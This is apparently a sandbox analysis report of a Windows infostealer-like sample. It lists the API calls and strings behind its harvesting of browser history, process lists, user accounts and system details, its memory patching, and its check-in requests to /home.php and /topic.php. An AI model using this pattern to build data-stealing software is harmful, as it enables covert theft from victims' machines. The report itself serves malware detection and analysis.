                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?,?,?,75572F70,00000000), ref: 02BB3151
                                                                                                                                                                                                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,75572F70,00000000), ref: 02BB3168
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00000101,?,?,?,75572F70,00000000), ref: 02BB318E
                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,InstallDate,00000000,?,?,?,?,?,75572F70,00000000), ref: 02BB31AF
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,75572F70,00000000), ref: 02BB31B9
                                                                                                                                                                                                                • CharUpperA.USER32(00000000,?,?,75572F70,00000000), ref: 02BB31DF
                                                                                                                                                                                                                • CharUpperA.USER32(00000000,?,?,?,75572F70,00000000), ref: 02BB31E8
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BB3201
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BB325F
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,75572F70,00000000), ref: 02BB328E
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,75572F70,00000000), ref: 02BB3297
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,02BC6E07,?,?,75572F70,00000000), ref: 02BB32A3
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,75572F70,00000000), ref: 02BB32A6
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,75572F70,00000000), ref: 02BB32B6
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,75572F70,00000000), ref: 02BB32B9
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,75572F70,00000000), ref: 02BB32C5
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,75572F70,00000000), ref: 02BB32C8
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$memset$Name$AllocCharComputerErrorFreeLastUpperUserValidate_snprintflstrcpyn$BackslashCloseEnvironmentInformationOpenPathQueryValueVariableVolume
                                                                                                                                                                                                                • String ID: %02X$%53%59%53%54%45%4D%21%31%31%34%31%32%37%21%30%32%39%36%43%44%43%30$%s!%s!%08X$InstallDate$SYSTEM$SYSTEM!114127!0296CDC0$Software\Microsoft\Windows NT\CurrentVersion$SystemDrive
                                                                                                                                                                                                                • API String ID: 2057876665-3677104015
                                                                                                                                                                                                                • Opcode ID: 187bc02db73aa95a63557cd599164ac45811e5ca5a7c600b1390523a2a1e4718
                                                                                                                                                                                                                • Instruction ID: 158ab4a0c10846fc958ccc3d6e6da7cd483fd8fc3d3daaaabb5894d9a012793b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 187bc02db73aa95a63557cd599164ac45811e5ca5a7c600b1390523a2a1e4718
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD51B371E00215ABEB609BA99C89FFBBBFCEF84740F4445C5FB45E7140E6B099048BA0

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\Internet Explorer\TypedURLs,00000000,00020119,?), ref: 02BB4925
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BB494D
                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,?,00000000,75573490), ref: 02BB4987
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB49A9
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02BB49B5
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,IE history:,0000000C,02BB58F1,00000000), ref: 02BB49C9
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02BB49D7
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB49EB
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02BB49F7
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02BF5C1C,00000001,00000000,00000000), ref: 02BB4A0B
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02BB4A19
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4A43
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB4A4F
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB4A64
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02BB4A74
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4A88
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB4A94
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB4AA8
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB4AB6
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BB4AD5
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 02BB4AEC
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$LockPointerUnlockWrite$_snprintf$CloseOpenQueryValue
                                                                                                                                                                                                                • String ID: IE history:$Software\Microsoft\Internet Explorer\TypedURLs$url%i
                                                                                                                                                                                                                • API String ID: 757183407-427538202
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 02BCA376
                                                                                                                                                                                                                • GetThreadPriority.KERNEL32(00000000,?,02BCA660,00000000,00000000,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA37D
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 02BCA386
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(02BCA660,00000008,00000040,?,?,02BCA660,00000000,00000000,?,?,?,?,?,?,02BC98DA,00000000), ref: 02BCA3A7
                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000012,00003000,00000040), ref: 02BCA3C6
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(00000000,00000012,00000040,?), ref: 02BCA3E2
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000000,00000004), ref: 02BCA3F8
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000004,-00000068), ref: 02BCA406
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000005,00000000), ref: 02BCA411
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000001,-0000009C), ref: 02BCA424
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000002,-00000081), ref: 02BCA435
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000003,-00000074), ref: 02BCA444
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000004,-00000024), ref: 02BCA453
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000005,-00000004), ref: 02BCA462
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000006,?), ref: 02BCA46A
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000002,-0000009D), ref: 02BCA47D
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000003,-000000C2), ref: 02BCA48E
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000004,-00000004), ref: 02BCA49D
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000005,00000000), ref: 02BCA4A9
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(00000005,00000012,?,00000000), ref: 02BCA4B3
                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 02BCA4BB
                                                                                                                                                                                                                • SetThreadPriority.KERNEL32(00000000), ref: 02BCA4C2
                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 02BCA4FE
                                                                                                                                                                                                                • SetThreadPriority.KERNEL32(00000000), ref: 02BCA505
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(02BCA660,00000008,00000000,02BCA660), ref: 02BCA51F
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExchangeInterlocked$Thread$Virtual$Protect$CurrentPriority$AllocCountTick
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2984368831-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNEL32(\\.\KmxAgent,00000000,00000000,00000000,00000003,00000080,00000000), ref: 00402313
                                                                                                                                                                                                                • DeviceIoControl.KERNEL32(00000000,86000054,000000B4,000000B4,?,00000004,?,00000000), ref: 00402343
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040234A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                                • String ID: "$"$0$4$D$E$E$S$T$\\.\KmxAgent$d$e$g$m$m$s$t$t
                                                                                                                                                                                                                • API String ID: 33631002-3172865025
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB4503
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000,75573490), ref: 02BB450E
                                                                                                                                                                                                                • Process32First.KERNEL32 ref: 02BB4531
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BB454D
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BB4567
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 02BB45A0
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BB45A7
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB45BB
                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?,?,00000000,?), ref: 02BB45EC
                                                                                                                                                                                                                • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104,?,?,?,?,00000000,?), ref: 02BB4603
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BB466C
                                                                                                                                                                                                                • Process32Next.KERNEL32(?,?), ref: 02BB467B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleHeapProcessProcess32memset$AllocCloseCreateFileFirstInformationModuleNameNextOpenSnapshotToolhelp32_snprintf
                                                                                                                                                                                                                • String ID: %d%s$[System Process]$taskmgr{PIDProcess name
                                                                                                                                                                                                                • API String ID: 3808533164-4214784430
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetFileType.KERNEL32(?,00000000,00000000), ref: 02BD8899
                                                                                                                                                                                                                • GetFileInformationByHandle.KERNEL32(?,?), ref: 02BD88B6
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$HandleInformationType
                                                                                                                                                                                                                • String ID: ,D0<$,D0<$D0<$D0<
                                                                                                                                                                                                                • API String ID: 4064226416-1748840775
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,00000000,00000000,00000000,00000000,75573490,?,?,?,?,02BB5903,00000000), ref: 02BB475A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000014,?,?,?,?,02BB5903,00000000,00000000,00000000), ref: 02BB47A5
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,02BB5903,00000000,00000000,00000000), ref: 02BB47AC
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB47BF
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BB480A
                                                                                                                                                                                                                • NetApiBufferFree.NETAPI32(00000000,?,?,?,?,02BB5903,00000000,00000000), ref: 02BB4841
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4884
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,02BB5904,00000000), ref: 02BB4896
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02BB5903,02BB5904,00000000,00000000), ref: 02BB48A8
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,02BB5904,00000000), ref: 02BB48B8
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,02BB5903), ref: 02BB48C7
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BB48CA
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,02BB5903), ref: 02BB48D7
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BB48DA
                                                                                                                                                                                                                • NetApiBufferFree.NETAPI32(00000000,?,?,?,?,02BB5903,00000000,00000000,00000000), ref: 02BB48ED
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$File$FreeProcess$Buffer$AllocDisplayInformationLockPointerQueryUnlockValidateWrite_snprintfmemset
                                                                                                                                                                                                                • String ID: %S$netuser{
                                                                                                                                                                                                                • API String ID: 37011087-3648794683
                                                                                                                                                                                                                • Opcode ID: 4cb70a6c8559afe7bb30c4fa43126952b24a3df2a1ca27fa3a5eb4ade02dacea
                                                                                                                                                                                                                • Instruction ID: e8124d959eacc7fd7ead620d3b59ce964f40fe71546b1c317f72c1cf1de9f150
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4cb70a6c8559afe7bb30c4fa43126952b24a3df2a1ca27fa3a5eb4ade02dacea
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5351E275D40259ABDB218FA4DC58BFEBBB8FF49740F508594FA41A7281D7B09904CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D3A4), ref: 02BB3DED
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D3A4), ref: 02BB3E23
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D3A4), ref: 02BB3E57
                                                                                                                                                                                                                • GetDateFormatA.KERNEL32(00000409,00000000,00000000,dd;MMM;yyyy,?,00000104), ref: 02BB3EA0
                                                                                                                                                                                                                • GetTimeFormatA.KERNEL32(00000409,00000000,00000000,HH;mm;ss,?,00000104), ref: 02BB3EC0
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BB3EE5
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D3A4), ref: 02BB3F37
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D3A4), ref: 02BB3FB7
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D3A4,00000000,?), ref: 02BB404B
                                                                                                                                                                                                                  • Part of subcall function 02BC39D0: EnterCriticalSection.KERNEL32(02BFFB68,75570F00,00000000,75572F00), ref: 02BC39E9
                                                                                                                                                                                                                  • Part of subcall function 02BC39D0: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 02BC39FB
                                                                                                                                                                                                                  • Part of subcall function 02BC39D0: _snprintf.MSVCRT ref: 02BC3A1B
                                                                                                                                                                                                                  • Part of subcall function 02BC39D0: SetCurrentDirectoryA.KERNEL32(?), ref: 02BC3A2B
                                                                                                                                                                                                                  • Part of subcall function 02BC39D0: PathAddBackslashA.SHLWAPI(?), ref: 02BC3B00
                                                                                                                                                                                                                  • Part of subcall function 02BB79C0: SetFileAttributesA.KERNEL32(00000000,00000000,02BC8ECD,?,?,?,?,?,?), ref: 02BB79C8
                                                                                                                                                                                                                  • Part of subcall function 02BB79C0: DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?), ref: 02BB79CF
                                                                                                                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02BB4072
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: BackslashPath$CurrentDirectoryFileFormat_snprintf$AttributesCriticalDateDeleteEnterFreeSectionTimeVirtual
                                                                                                                                                                                                                • String ID: DEBUG$HH;mm;ss$dd;MMM;yyyy$debug_%s_%s.log$scr.bmp$sysinfo.log
                                                                                                                                                                                                                • API String ID: 203013662-44577846
                                                                                                                                                                                                                • Opcode ID: 32415920875d17c98bb552a662c9e73db340c7d5670ac3349a897d4500ffbed2
                                                                                                                                                                                                                • Instruction ID: c5db08fb451bcc7777c2f998232d7a9922353337cf2e617e00f8e0cd9dfdf964
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 32415920875d17c98bb552a662c9e73db340c7d5670ac3349a897d4500ffbed2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B67139316006465FDB26DB3C58A47FABBF5EF85300F5441D4E98AEB240DBB1AE48CB80
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset$strstrstrtol
                                                                                                                                                                                                                • String ID: %s%s$1676d5775e05c50b46baa5579d4fc7$eyuioa$qwrtpsdfghjklzxcvbnm
                                                                                                                                                                                                                • API String ID: 600650289-3097137778
                                                                                                                                                                                                                • Opcode ID: 4f4c37c10b3d4599806e1099ee89ce023c2fcd839dbc5b1263a6e402b1d9fc37
                                                                                                                                                                                                                • Instruction ID: 8ee7fbeca3c9419a6d255ef3a4d546c1bdcf1295b1c9e212ebfe8d6b2ac355af
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f4c37c10b3d4599806e1099ee89ce023c2fcd839dbc5b1263a6e402b1d9fc37
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 98715731E442585BDB62CB789C81BEEBBB9AF48700F1444E8EB49A3281D3B45E55CB60
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC3821
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC383C
                                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,?,?,?,?,75570F00,00000000,00000000), ref: 02BC3856
                                                                                                                                                                                                                • GetTempFileNameA.KERNEL32(?,00000000,00000000,?,?,?,?,75570F00,00000000,00000000), ref: 02BC386C
                                                                                                                                                                                                                  • Part of subcall function 02BB6C70: memset.MSVCRT ref: 02BB6CA1
                                                                                                                                                                                                                  • Part of subcall function 02BB6C70: memset.MSVCRT ref: 02BB6CBF
                                                                                                                                                                                                                  • Part of subcall function 02BB6C70: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?,?,?,?,?,?,00000000), ref: 02BB6CDB
                                                                                                                                                                                                                  • Part of subcall function 02BB6C70: RegQueryValueExA.KERNEL32(?,9E9388F8a,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02BB6D02
                                                                                                                                                                                                                  • Part of subcall function 02BB6C70: GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02BB6D7A
                                                                                                                                                                                                                  • Part of subcall function 02BB6C70: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02BB6D81
                                                                                                                                                                                                                  • Part of subcall function 02BB6C70: memset.MSVCRT ref: 02BB6D95
                                                                                                                                                                                                                  • Part of subcall function 02BB6C70: lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02BB6DAE
                                                                                                                                                                                                                  • Part of subcall function 02BB6C70: RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 02BB6DBC
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,75570F00,00000000,00000000), ref: 02BC38BB
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,?,75570F00,00000000,00000000), ref: 02BC38C2
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,75570F00,00000000,00000000), ref: 02BC38CE
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,75570F00,00000000,00000000), ref: 02BC38D5
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000,00000001,00000000,00000000,/topic.php,?,00000001,00000001,00000001,00000000,00000001,?,?,?,75570F00), ref: 02BC394D
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?,?,?,?,75570F00,00000000,00000000), ref: 02BC395A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,75570F00,00000000,00000000), ref: 02BC3998
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,?,75570F00,00000000,00000000), ref: 02BC399B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,75570F00,00000000,00000000), ref: 02BC39A7
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,75570F00,00000000,00000000), ref: 02BC39AA
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Processmemset$File$FreeTempValidate$AllocAttributesCloseDeleteNameOpenPathQueryValuelstrcpyn
                                                                                                                                                                                                                • String ID: /topic.php
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02BCA1CA
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?), ref: 02BCA1D7
                                                                                                                                                                                                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02BCA1F4
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00019E40,?,00000000,00000000), ref: 02BCA23E
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCA256
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BCA267
                                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,?), ref: 02BCA279
                                                                                                                                                                                                                • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 02BCA291
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BCA2B1
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000,00000000,/home.php,?,00000001,?,?,00000001,00000000), ref: 02BCA327
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 02BCA334
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$HandleInformationPathTemp$AttributesBackslashCloseCreateDeleteEnvironmentNameThreadVariableVolume_snprintf
                                                                                                                                                                                                                • String ID: %53%59%53%54%45%4D%21%31%31%34%31%32%37%21%30%32%39%36%43%44%43%30$/home.php$SystemDrive$name=%s&port=%u
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0040255C
                                                                                                                                                                                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 004025C0
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,000017A8,00000000,00000000), ref: 004025E3
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004025F8
